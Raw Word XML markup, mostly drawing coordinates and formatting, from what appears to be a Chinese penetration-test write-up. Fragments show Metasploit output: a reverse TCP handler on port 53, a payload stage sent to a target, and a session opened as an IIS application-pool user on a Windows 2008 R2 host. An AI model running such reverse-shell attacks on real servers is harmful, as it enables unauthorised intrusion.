481,12448,4481,12448,4481,12447,4481,12447,4481,12447,4481,12446,4481,12446,4481,12445,4481,12445,4481,12444,4481,12444,4481,12443,4481,12443,4481,12442,4481,12441,4481,12441,4481,12440,4481,12439,4481,12438,4481,12437,4481,12436,4481,12436,4481,12435,4481,12434,4481,12432,4481,12431,4481,12430,4481,12429,4481,12428,4481,12426,4481,12425,4481,12424,4481,12422,4481,12421,4481,12419,4481,12418,4481,12416,4481,12414,4481,12412,4481,12411,4481,12409,4481,12407,4481,12405,4481,12403,4481,12401,4481,12398,4481,12396,4481,12394,4481,12391,4481,12389,4481,12386,4481,12384,4481,12381,4481,12378,4481,12376,4481,12373,4481,12370,4481,12367,4481,12364,4481,12361,4481,12357,4481,12354,4481,12351,4481,12347,4481,12344,4481,12340,4481,12336,4481,12332,4481,12328,4481,12325,4481,12320,4481,12316,4481,12312,4481,12308,4481,12303,4481,12299,4481,12294,4481,12290,4481,12285,4481,12280,4481,12275,4481,12270,4481,12265,4481,12260,4481,12254,4481,12249,4481,12243,4481,12238,4481,12232,4481,12226,4481,12220,4481,12214,4481,12208,4481,12202,4481,12195e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:169.500pt;margin-top:644.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3390,12890" coordsize="130,250">
        <v:shape style="position:absolute;left:3390;top:12890;width:130;height:250" coordorigin="3390,12890" coordsize="130,250" path="m3416,12900l3416,12900,3416,12900,3416,12900,3416,12900,3416,12900,3416,12900,3416,12900,3416,12900,3416,12900,3416,12900,3416,12900,3416,12900,3416,12900,3416,12900,3416,12900,3416,12900,3416,12900,3416,12900,3416,12900,3416,12900,3416,12900,3416,12900,3416,12900,3417,12900,3417,12900,3417,12900,3417,12900,3417,12900,3417,12900,3417,12900,3418,12900,3418,12900,3418,12900,3418,12900,3419,12900,3419,12900,3419,12900,3419,12900,3420,12900,3420,12900,3420,12900,3421,12900,3421,12900,3421,12900,3422,12900,3422,12900,3423,12900,3423,12900,3424,12900,3424,12900,3425,12900,3425,12900,3426,12900,3426,12900,3427,12900,3428,12900,3428,12900,3429,12900,3430,12900,3430,12900,3431,12900,3432,12900,3433,12900,3434,12900,3434,12900,3435,12900,3436,12900,3437,12900,3438,12900,3439,12900,3440,12900,3441,12900,3442,12900,3443,12900,3445,12900,3446,12900,3447,12900,3448,12900,3450,12900,3451,12900,3452,12900,3454,12900,3455,12900,3456,12900,3458,12900,3459,12900,3461,12900,3463,12900,3464,12900,3466,12900,3468,12900,3469,12900,3471,12900,3473,12900,3475,12900,3477,12900,3479,12900,3481,12900,3483,12900,3485,12900,3487,12900,3489,12900,3491,12900,3494,12900,3496,12900,3498,12900,3501,12900,3503,12900,3505,12900,3508,12900,3511,12900,3513,12900,3516,12900,3519,12900,3521,12900,3524,12900,3527,12900,3530,12900,3533,12900,3536,12900,3536,12900,3536,12900,3536,12900,3536,12900,3536,12900,3536,12901,3536,12901,3536,12901,3536,12901,3536,12901,3536,12901,3536,12901,3536,12901,3536,12901,3536,12901,3536,12901,3536,12901,3536,12901,3536,12901,3536,12902,3536,12902,3536,12902,3536,12902,3536,12902,3536,12903,3536,12903,3536,12903,3536,12903,3536,12904,3536,12904,3536,12905,3536,12905,3536,12905,3536,12906,3536,12906,3536,12907,3536,12908,3536,12908,3536,12909,3536,12909,3536,12910,3536,12911,3536,12912,3536,12913,3536,12913,3536,12914,3536,12915,3536,12916,3536,12917,3536,12918,3536,12919,3536,12921,3536,12922,3536,12923,3536,12924,3536,12926,3536,12927,3536,12929,3536,12930,3536,12932,3536,12933,3536,12935,3536,12937,3536,12938,3536,12940,3536,12942,3536,12944,3536,12946,3536,12948,3536,12950,3536,12952,3536,12955,3536,12957,3536,12959,3536,12962,3536,12964,3536,12967,3536,12970,3536,12972,3536,12975,3536,12978,3536,12981,3536,12984,3536,12987,3536,12990,3536,12993,3536,12997,3536,13000,3536,13004,3536,13007,3536,13011,3536,13015,3536,13018,3536,13022,3536,13026,3536,13030,3536,13034,3536,13039,3536,13043,3536,13047,3536,13052,3536,13056,3536,13061,3536,13066,3536,13071,3536,13076,3536,13081,3536,13086,3536,13091,3536,13097,3536,13102,3536,13108,3536,13113,3536,13119,3536,13125,3536,13131,3536,13137,3536,13143,3536,13149,3536,13156,3536,13156,3536,13156,3536,13156,3536,13156,3536,13156,3536,13156,3536,13156,3536,13156,3536,13156,3536,13156,3536,13156,3536,13156,3536,13156,3536,13156,3536,13156,3536,13156,3535,13156,3535,13156,3535,13156,3535,13156,3535,13156,3535,13156,3535,13156,3535,13156,3535,13156,3535,13156,3535,13156,3534,13156,3534,13156,3534,13156,3534,13156,3534,13156,3533,13156,3533,13156,3533,13156,3533,13156,3532,13156,3532,13156,3532,13156,3532,13156,3531,13156,3531,13156,3531,13156,3530,13156,3530,13156,3529,13156,3529,13156,3528,13156,3528,13156,3527,13156,3527,13156,3526,13156,3526,13156,3525,13156,3525,13156,3524,13156,3523,13156,3523,13156,3522,13156,3521,13156,3520,13156,3520,13156,3519,13156,3518,13156,3517,13156,3516,13156,3515,13156,3514,13156,3513,13156,3512,13156,3511,13156,3510,13156,3509,13156,3508,13156,3507,13156,3506,13156,3505,13156,3503,13156,3502,13156,3501,13156,3499,13156,3498,13156,3496,13156,3495,13156,3494,13156,3492,13156,3490,13156,3489,13156,3487,13156,3486,13156,3484,13156,3482,13156,3480,13156,3478,13156,3477,13156,3475,13156,3473,13156,3471,13156,3469,13156,3467,13156,3465,13156,3462,13156,3460,13156,3458,13156,3456,13156,3453,13156,3451,13156,3449,13156,3446,13156,3444,13156,3441,13156,3438,13156,3436,13156,3433,13156,3430,13156,3427,13156,3425,13156,3422,13156,3419,13156,3416,13156,3416,13156,3416,13156,3416,13156,3416,13156,3416,13156,3416,13156,3416,13156,3416,13156,3416,13156,3416,13156,3416,13155,3416,13155,3416,13155,3416,13155,3416,13155,3416,13155,3416,13155,3416,13155,3416,13155,3416,13155,3416,13154,3416,13154,3416,13154,3416,13154,3416,13154,3416,13153,3416,13153,3416,13153,3416,13152,3416,13152,3416,13152,3416,13151,3416,13151,3416,13150,3416,13150,3416,13149,3416,13149,3416,13148,3416,13147,3416,13147,3416,13146,3416,13145,3416,13144,3416,13144,3416,13143,3416,13142,3416,13141,3416,13140,3416,13139,3416,13138,3416,13137,3416,13136,3416,13134,3416,13133,3416,13132,3416,13130,3416,13129,3416,13128,3416,13126,3416,13125,3416,13123,3416,13121,3416,13120,3416,13118,3416,13116,3416,13114,3416,13112,3416,13110,3416,13108,3416,13106,3416,13104,3416,13101,3416,13099,3416,13097,3416,13094,3416,13092,3416,13089,3416,13087,3416,13084,3416,13081,3416,13078,3416,13075,3416,13072,3416,13069,3416,13066,3416,13063,3416,13059,3416,13056,3416,13052,3416,13049,3416,13045,3416,13042,3416,13038,3416,13034,3416,13030,3416,13026,3416,13022,3416,13017,3416,13013,3416,13009,3416,13004,3416,13000,3416,12995,3416,12990,3416,12985,3416,12980,3416,12975,3416,12970,3416,12965,3416,12960,3416,12954,3416,12949,3416,12943,3416,12937,3416,12931,3416,12925,3416,12919,3416,12913,3416,12907,3416,12900e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:169.500pt;margin-top:680.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3390,13610" coordsize="130,270">
        <v:shape style="position:absolute;left:3390;top:13610;width:130;height:270" coordorigin="3390,13610" coordsize="130,270" path="m3416,13636l3416,13636,3416,13636,3416,13636,3416,13636,3416,13636,3416,13636,3416,13636,3416,13636,3416,13636,3416,13636,3416,13636,3416,13636,3416,13636,3416,13636,3416,13636,3416,13636,3416,13636,3416,13636,3416,13636,3416,13636,3416,13636,3416,13636,3416,13636,3417,13636,3417,13636,3417,13636,3417,13636,3417,13636,3417,13636,3417,13636,3418,13636,3418,13636,3418,13636,3418,13636,3419,13636,3419,13636,3419,13636,3419,13636,3420,13636,3420,13636,3420,13636,3421,13636,3421,13636,3421,13636,3422,13636,3422,13636,3423,13636,3423,13636,3424,13636,3424,13636,3425,13636,3425,13636,3426,13636,3426,13636,3427,13636,3428,13636,3428,13636,3429,13636,3430,13636,3430,13636,3431,13636,3432,13636,3433,13636,3434,13636,3434,13636,3435,13636,3436,13636,3437,13636,3438,13636,3439,13636,3440,13636,3441,13636,3442,13636,3443,13636,3445,13636,3446,13636,3447,13636,3448,13636,3450,13636,3451,13636,3452,13636,3454,13636,3455,13636,3456,13636,3458,13636,3459,13636,3461,13636,3463,13636,3464,13636,3466,13636,3468,13636,3469,13636,3471,13636,3473,13636,3475,13636,3477,13636,3479,13636,3481,13636,3483,13636,3485,13636,3487,13636,3489,13636,3491,13636,3494,13636,3496,13636,3498,13636,3501,13636,3503,13636,3505,13636,3508,13636,3511,13636,3513,13636,3516,13636,3519,13636,3521,13636,3524,13636,3527,13636,3530,13636,3533,13636,3536,13636,3536,13636,3536,13636,3536,13636,3536,13636,3536,13636,3536,13636,3536,13636,3536,13636,3536,13636,3536,13636,3536,13636,3536,13636,3536,13636,3536,13636,3536,13636,3536,13636,3536,13636,3536,13637,3536,13637,3536,13637,3536,13637,3536,13637,3536,13637,3536,13638,3536,13638,3536,13638,3536,13639,3536,13639,3536,13639,3536,13640,3536,13640,3536,13640,3536,13641,3536,13641,3536,13642,3536,13642,3536,13643,3536,13644,3536,13644,3536,13645,3536,13646,3536,13646,3536,13647,3536,13648,3536,13649,3536,13650,3536,13651,3536,13652,3536,13653,3536,13654,3536,13655,3536,13656,3536,13657,3536,13658,3536,13660,3536,13661,3536,13662,3536,13664,3536,13665,3536,13667,3536,13669,3536,13670,3536,13672,3536,13674,3536,13676,3536,13677,3536,13679,3536,13681,3536,13683,3536,13686,3536,13688,3536,13690,3536,13692,3536,13695,3536,13697,3536,13700,3536,13702,3536,13705,3536,13708,3536,13711,3536,13713,3536,13716,3536,13719,3536,13722,3536,13726,3536,13729,3536,13732,3536,13736,3536,13739,3536,13743,3536,13746,3536,13750,3536,13754,3536,13758,3536,13762,3536,13766,3536,13770,3536,13774,3536,13778,3536,13783,3536,13787,3536,13792,3536,13797,3536,13801,3536,13806,3536,13811,3536,13816,3536,13821,3536,13827,3536,13832,3536,13837,3536,13843,3536,13849,3536,13854,3536,13860,3536,13866,3536,13872,3536,13878,3536,13885,3536,13891,3536,13891,3536,13891,3536,13891,3536,13891,3536,13891,3536,13891,3536,13891,3536,13891,3536,13891,3536,13891,3536,13891,3536,13891,3536,13891,3536,13891,3536,13891,3536,13891,3535,13891,3535,13891,3535,13891,3535,13891,3535,13891,3535,13891,3535,13891,3535,13891,3535,13891,3535,13891,3535,13891,3534,13891,3534,13891,3534,13891,3534,13891,3534,13891,3533,13891,3533,13891,3533,13891,3533,13891,3532,13891,3532,13891,3532,13891,3532,13891,3531,13891,3531,13891,3531,13891,3530,13891,3530,13891,3529,13891,3529,13891,3528,13891,3528,13891,3527,13891,3527,13891,3526,13891,3526,13891,3525,13891,3525,13891,3524,13891,3523,13891,3523,13891,3522,13891,3521,13891,3520,13891,3520,13891,3519,13891,3518,13891,3517,13891,3516,13891,3515,13891,3514,13891,3513,13891,3512,13891,3511,13891,3510,13891,3509,13891,3508,13891,3507,13891,3506,13891,3505,13891,3503,13891,3502,13891,3501,13891,3499,13891,3498,13891,3496,13891,3495,13891,3494,13891,3492,13891,3490,13891,3489,13891,3487,13891,3486,13891,3484,13891,3482,13891,3480,13891,3478,13891,3477,13891,3475,13891,3473,13891,3471,13891,3469,13891,3467,13891,3465,13891,3462,13891,3460,13891,3458,13891,3456,13891,3453,13891,3451,13891,3449,13891,3446,13891,3444,13891,3441,13891,3438,13891,3436,13891,3433,13891,3430,13891,3427,13891,3425,13891,3422,13891,3419,13891,3416,13891,3416,13891,3416,13891,3416,13891,3416,13891,3416,13891,3416,13891,3416,13891,3416,13891,3416,13891,3416,13891,3416,13891,3416,13891,3416,13891,3416,13891,3416,13891,3416,13890,3416,13890,3416,13890,3416,13890,3416,13890,3416,13890,3416,13890,3416,13889,3416,13889,3416,13889,3416,13889,3416,13888,3416,13888,3416,13888,3416,13887,3416,13887,3416,13886,3416,13886,3416,13886,3416,13885,3416,13884,3416,13884,3416,13883,3416,13883,3416,13882,3416,13881,3416,13881,3416,13880,3416,13879,3416,13878,3416,13877,3416,13876,3416,13875,3416,13874,3416,13873,3416,13872,3416,13871,3416,13870,3416,13868,3416,13867,3416,13866,3416,13864,3416,13863,3416,13861,3416,13860,3416,13858,3416,13857,3416,13855,3416,13853,3416,13851,3416,13849,3416,13847,3416,13845,3416,13843,3416,13841,3416,13839,3416,13837,3416,13834,3416,13832,3416,13830,3416,13827,3416,13825,3416,13822,3416,13819,3416,13816,3416,13813,3416,13811,3416,13808,3416,13804,3416,13801,3416,13798,3416,13795,3416,13791,3416,13788,3416,13784,3416,13781,3416,13777,3416,13773,3416,13769,3416,13765,3416,13761,3416,13757,3416,13753,3416,13748,3416,13744,3416,13740,3416,13735,3416,13730,3416,13726,3416,13721,3416,13716,3416,13711,3416,13706,3416,13700,3416,13695,3416,13689,3416,13684,3416,13678,3416,13673,3416,13667,3416,13661,3416,13655,3416,13649,3416,13642,3416,13636e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:186.500pt;margin-top:699.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3730,13990" coordsize="130,270">
        <v:shape style="position:absolute;left:3730;top:13990;width:130;height:270" coordorigin="3730,13990" coordsize="130,270" path="m3746,14011l3746,14011,3746,14011,3746,14011,3746,14011,3746,14011,3746,14011,3746,14011,3746,14011,3746,14011,3746,14011,3746,14011,3746,14011,3746,14011,3746,14011,3746,14011,3746,14011,3746,14011,3746,14011,3746,14011,3746,14011,3746,14011,3747,14011,3747,14011,3747,14011,3747,14011,3747,14011,3747,14011,3747,14011,3747,14011,3748,14011,3748,14011,3748,14011,3748,14011,3748,14011,3749,14011,3749,14011,3749,14011,3749,14011,3750,14011,3750,14011,3750,14011,3751,14011,3751,14011,3752,14011,3752,14011,3752,14011,3753,14011,3753,14011,3754,14011,3754,14011,3755,14011,3755,14011,3756,14011,3756,14011,3757,14011,3758,14011,3758,14011,3759,14011,3760,14011,3761,14011,3761,14011,3762,14011,3763,14011,3764,14011,3765,14011,3765,14011,3766,14011,3767,14011,3768,14011,3769,14011,3770,14011,3771,14011,3772,14011,3774,14011,3775,14011,3776,14011,3777,14011,3778,14011,3780,14011,3781,14011,3782,14011,3784,14011,3785,14011,3787,14011,3788,14011,3790,14011,3791,14011,3793,14011,3794,14011,3796,14011,3798,14011,3800,14011,3801,14011,3803,14011,3805,14011,3807,14011,3809,14011,3811,14011,3813,14011,3815,14011,3817,14011,3819,14011,3821,14011,3824,14011,3826,14011,3828,14011,3831,14011,3833,14011,3836,14011,3838,14011,3841,14011,3843,14011,3846,14011,3849,14011,3851,14011,3854,14011,3857,14011,3860,14011,3863,14011,3866,14011,3866,14011,3866,14011,3866,14011,3866,14011,3866,14011,3866,14011,3866,14011,3866,14011,3866,14011,3866,14011,3866,14011,3866,14011,3866,14011,3866,14011,3866,14011,3866,14012,3866,14012,3866,14012,3866,14012,3866,14012,3866,14012,3866,14012,3866,14013,3866,14013,3866,14013,3866,14013,3866,14014,3866,14014,3866,14014,3866,14015,3866,14015,3866,14016,3866,14016,3866,14016,3866,14017,3866,14018,3866,14018,3866,14019,3866,14019,3866,14020,3866,14021,3866,14021,3866,14022,3866,14023,3866,14024,3866,14025,3866,14026,3866,14027,3866,14028,3866,14029,3866,14030,3866,14031,3866,14032,3866,14034,3866,14035,3866,14036,3866,14038,3866,14039,3866,14041,3866,14042,3866,14044,3866,14045,3866,14047,3866,14049,3866,14051,3866,14053,3866,14055,3866,14057,3866,14059,3866,14061,3866,14063,3866,14065,3866,14068,3866,14070,3866,14072,3866,14075,3866,14078,3866,14080,3866,14083,3866,14086,3866,14089,3866,14092,3866,14095,3866,14098,3866,14101,3866,14104,3866,14107,3866,14111,3866,14114,3866,14118,3866,14121,3866,14125,3866,14129,3866,14133,3866,14137,3866,14141,3866,14145,3866,14149,3866,14154,3866,14158,3866,14162,3866,14167,3866,14172,3866,14176,3866,14181,3866,14186,3866,14191,3866,14197,3866,14202,3866,14207,3866,14213,3866,14218,3866,14224,3866,14230,3866,14235,3866,14241,3866,14247,3866,14254,3866,14260,3866,14266,3866,14266,3866,14266,3866,14266,3866,14266,3866,14266,3866,14266,3866,14266,3866,14266,3866,14266,3866,14266,3866,14266,3866,14266,3866,14266,3866,14266,3866,14266,3866,14266,3866,14266,3866,14266,3866,14266,3865,14266,3865,14266,3865,14266,3865,14266,3865,14266,3865,14266,3865,14266,3865,14266,3865,14266,3864,14266,3864,14266,3864,14266,3864,14266,3864,14266,3863,14266,3863,14266,3863,14266,3863,14266,3862,14266,3862,14266,3862,14266,3861,14266,3861,14266,3861,14266,3860,14266,3860,14266,3859,14266,3859,14266,3859,14266,3858,14266,3858,14266,3857,14266,3856,14266,3856,14266,3855,14266,3855,14266,3854,14266,3853,14266,3853,14266,3852,14266,3851,14266,3851,14266,3850,14266,3849,14266,3848,14266,3847,14266,3846,14266,3845,14266,3845,14266,3844,14266,3843,14266,3842,14266,3840,14266,3839,14266,3838,14266,3837,14266,3836,14266,3835,14266,3833,14266,3832,14266,3831,14266,3829,14266,3828,14266,3827,14266,3825,14266,3824,14266,3822,14266,3821,14266,3819,14266,3817,14266,3816,14266,3814,14266,3812,14266,3810,14266,3809,14266,3807,14266,3805,14266,3803,14266,3801,14266,3799,14266,3797,14266,3795,14266,3793,14266,3790,14266,3788,14266,3786,14266,3783,14266,3781,14266,3779,14266,3776,14266,3774,14266,3771,14266,3769,14266,3766,14266,3763,14266,3760,14266,3758,14266,3755,14266,3752,14266,3749,14266,3746,14266,3746,14266,3746,14266,3746,14266,3746,14266,3746,14266,3746,14266,3746,14266,3746,14266,3746,14266,3746,14266,3746,14266,3746,14266,3746,14266,3746,14266,3746,14266,3746,14266,3746,14266,3746,14265,3746,14265,3746,14265,3746,14265,3746,14265,3746,14265,3746,14264,3746,14264,3746,14264,3746,14264,3746,14263,3746,14263,3746,14262,3746,14262,3746,14262,3746,14261,3746,14261,3746,14260,3746,14260,3746,14259,3746,14259,3746,14258,3746,14257,3746,14256,3746,14256,3746,14255,3746,14254,3746,14253,3746,14252,3746,14251,3746,14250,3746,14249,3746,14248,3746,14247,3746,14246,3746,14245,3746,14244,3746,14242,3746,14241,3746,14240,3746,14238,3746,14237,3746,14235,3746,14233,3746,14232,3746,14230,3746,14228,3746,14226,3746,14225,3746,14223,3746,14221,3746,14219,3746,14216,3746,14214,3746,14212,3746,14210,3746,14207,3746,14205,3746,14202,3746,14200,3746,14197,3746,14194,3746,14192,3746,14189,3746,14186,3746,14183,3746,14180,3746,14176,3746,14173,3746,14170,3746,14166,3746,14163,3746,14159,3746,14156,3746,14152,3746,14148,3746,14144,3746,14140,3746,14136,3746,14132,3746,14128,3746,14124,3746,14119,3746,14115,3746,14110,3746,14106,3746,14101,3746,14096,3746,14091,3746,14086,3746,14081,3746,14075,3746,14070,3746,14065,3746,14059,3746,14053,3746,14048,3746,14042,3746,14036,3746,14030,3746,14024,3746,14017,3746,1401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靶</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>机执行：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2" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="5511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Started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reverse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TCP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53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Sending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stage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206403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bytes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to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.2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42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*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]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session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6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opened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.4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.2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49744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2019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01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23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01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29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00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0500</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="137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6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getuid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Server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username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IIS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APPPOOL\DefaultAppPool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sysinfo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Computer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WIN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5BMI9HGC42S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OS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Windows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2008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R2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Build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7600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Architecture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x64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System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Language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zh_CN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Domain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WORKGROUP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504.729pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,10094">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:10094" coordorigin="10402,0" coordsize="0,10094" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,3,10402,4,10402,5,10402,7,10402,10,10402,13,10402,16,10402,20,10402,24,10402,29,10402,34,10402,41,10402,47,10402,55,10402,63,10402,72,10402,82,10402,93,10402,105,10402,117,10402,131,10402,146,10402,161,10402,178,10402,196,10402,215,10402,235,10402,256,10402,279,10402,303,10402,328,10402,355,10402,383,10402,412,10402,443,10402,476,10402,510,10402,545,10402,583,10402,621,10402,662,10402,704,10402,748,10402,794,10402,842,10402,891,10402,943,10402,996,10402,1051,10402,1109,10402,1168,10402,1230,10402,1293,10402,1359,10402,1427,10402,1497,10402,1570,10402,1645,10402,1722,10402,1801,10402,1883,10402,1967,10402,2054,10402,2143,10402,2235,10402,2330,10402,2427,10402,2527,10402,2629,10402,2734,10402,2842,10402,2953,10402,3067,10402,3183,10402,3302,10402,3425,10402,3550,10402,3678,10402,3810,10402,3944,10402,4082,10402,4222,10402,4366,10402,4514,10402,4664,10402,4818,10402,4975,10402,5135,10402,5299,10402,5467,10402,5638,10402,5812,10402,5990,10402,6171,10402,6356,10402,6545,10402,6738,10402,6934,10402,7134,10402,7338,10402,7546,10402,7757,10402,7973,10402,8192,10402,8415,10402,8643,10402,8874,10402,9110,10402,9350,10402,9594,10402,9842,10402,10094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999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999l1517,999,1517,999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7.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2090" coordsize="8990,350">
        <v:shape style="position:absolute;left:1490;top:2090;width:8990;height:350" coordorigin="1490,2090" coordsize="8990,35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4,10484,2114,10484,2114,10484,2115,10484,2115,10484,2116,10484,2116,10484,2117,10484,2118,10484,2118,10484,2119,10484,2120,10484,2121,10484,2122,10484,2123,10484,2124,10484,2125,10484,2126,10484,2127,10484,2128,10484,2129,10484,2130,10484,2132,10484,2133,10484,2135,10484,2136,10484,2138,10484,2139,10484,2141,10484,2143,10484,2144,10484,2146,10484,2148,10484,2150,10484,2152,10484,2155,10484,2157,10484,2159,10484,2161,10484,2164,10484,2166,10484,2169,10484,2172,10484,2174,10484,2177,10484,2180,10484,2183,10484,2186,10484,2189,10484,2193,10484,2196,10484,2200,10484,2203,10484,2207,10484,2210,10484,2214,10484,2218,10484,2222,10484,2226,10484,2230,10484,2235,10484,2239,10484,2244,10484,2248,10484,2253,10484,2258,10484,2263,10484,2268,10484,2273,10484,2278,10484,2283,10484,2289,10484,2294,10484,2300,10484,2306,10484,2312,10484,2318,10484,2324,10484,2330,10484,2337,10484,2343,10484,2350,10484,2357,10484,2364,10484,2371,10484,2378,10484,2385,10484,2393,10484,2400,10484,2408,10484,2416,10484,2424,10484,2432,10484,2440,10484,2440,10484,2440,10484,2440,10484,2440,10484,2440,10484,2440,10483,2440,10482,2440,10482,2440,10480,2440,10479,2440,10477,2440,10475,2440,10473,2440,10470,2440,10466,2440,10462,2440,10458,2440,10453,2440,10448,2440,10442,2440,10435,2440,10428,2440,10419,2440,10411,2440,10401,2440,10391,2440,10379,2440,10367,2440,10354,2440,10340,2440,10326,2440,10310,2440,10293,2440,10275,2440,10256,2440,10236,2440,10215,2440,10192,2440,10168,2440,10143,2440,10117,2440,10090,2440,10061,2440,10031,2440,9999,2440,9966,2440,9931,2440,9895,2440,9858,2440,9819,2440,9778,2440,9735,2440,9691,2440,9646,2440,9598,2440,9549,2440,9498,2440,9445,2440,9391,2440,9334,2440,9275,2440,9215,2440,9153,2440,9088,2440,9022,2440,8953,2440,8883,2440,8810,2440,8735,2440,8658,2440,8578,2440,8497,2440,8413,2440,8326,2440,8238,2440,8146,2440,8053,2440,7957,2440,7859,2440,7758,2440,7654,2440,7548,2440,7439,2440,7328,2440,7214,2440,7097,2440,6977,2440,6855,2440,6730,2440,6602,2440,6471,2440,6337,2440,6201,2440,6061,2440,5918,2440,5773,2440,5624,2440,5472,2440,5317,2440,5159,2440,4997,2440,4833,2440,4665,2440,4494,2440,4319,2440,4141,2440,3960,2440,3776,2440,3587,2440,3396,2440,3201,2440,3002,2440,2800,2440,2594,2440,2385,2440,2172,2440,1955,2440,1734,2440,1510,2440,1510,2440,1510,2440,1510,2440,1510,2440,1510,2440,1510,2440,1510,2440,1510,2440,1510,2440,1510,2440,1510,2440,1510,2440,1510,2440,1510,2440,1510,2440,1510,2440,1510,2439,1510,2439,1510,2439,1510,2439,1510,2439,1510,2438,1510,2438,1510,2438,1510,2438,1510,2437,1510,2437,1510,2436,1510,2436,1510,2435,1510,2435,1510,2434,1510,2434,1510,2433,1510,2433,1510,2432,1510,2431,1510,2430,1510,2429,1510,2429,1510,2428,1510,2427,1510,2426,1510,2425,1510,2424,1510,2422,1510,2421,1510,2420,1510,2419,1510,2417,1510,2416,1510,2414,1510,2413,1510,2411,1510,2409,1510,2408,1510,2406,1510,2404,1510,2402,1510,2400,1510,2398,1510,2396,1510,2394,1510,2391,1510,2389,1510,2386,1510,2384,1510,2381,1510,2379,1510,2376,1510,2373,1510,2370,1510,2367,1510,2364,1510,2361,1510,2358,1510,2354,1510,2351,1510,2347,1510,2344,1510,2340,1510,2336,1510,2332,1510,2328,1510,2324,1510,2320,1510,2316,1510,2311,1510,2307,1510,2302,1510,2297,1510,2293,1510,2288,1510,2283,1510,2277,1510,2272,1510,2267,1510,2261,1510,2256,1510,2250,1510,2244,1510,2238,1510,2232,1510,2226,1510,2220,1510,2213,1510,2207,1510,2200,1510,2193,1510,2186,1510,2179,1510,2172,1510,2165,1510,2158,1510,2150,1510,2142,1510,2134,1510,2126,1510,2118,1510,2110e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:104.500pt;width:1.500pt;height:17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2090" coordsize="30,350">
        <v:shape style="position:absolute;left:1490;top:2090;width:30;height:350" coordorigin="1490,2090" coordsize="30,350" path="m1517,2110l1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2111,1517,2111,1517,2111,1517,2111,1517,2111,1517,2111,1517,2112,1517,2112,1517,2112,1517,2112,1517,2113,1517,2113,1517,2114,1517,2114,1517,2114,1517,2115,1517,2115,1517,2116,1517,2116,1517,2117,1517,2118,1517,2118,1517,2119,1517,2120,1517,2121,1517,2122,1517,2123,1517,2124,1517,2125,1517,2126,1517,2127,1517,2128,1517,2129,1517,2130,1517,2132,1517,2133,1517,2135,1517,2136,1517,2138,1517,2139,1517,2141,1517,2143,1517,2144,1517,2146,1517,2148,1517,2150,1517,2152,1517,2155,1517,2157,1517,2159,1517,2161,1517,2164,1517,2166,1517,2169,1517,2172,1517,2174,1517,2177,1517,2180,1517,2183,1517,2186,1517,2189,1517,2193,1517,2196,1517,2200,1517,2203,1517,2207,1517,2210,1517,2214,1517,2218,1517,2222,1517,2226,1517,2230,1517,2235,1517,2239,1517,2244,1517,2248,1517,2253,1517,2258,1517,2263,1517,2268,1517,2273,1517,2278,1517,2283,1517,2289,1517,2294,1517,2300,1517,2306,1517,2312,1517,2318,1517,2324,1517,2330,1517,2337,1517,2343,1517,2350,1517,2357,1517,2364,1517,2371,1517,2378,1517,2385,1517,2393,1517,2400,1517,2408,1517,2416,1517,2424,1517,2432,1517,2440e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:121.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2430" coordsize="8990,370">
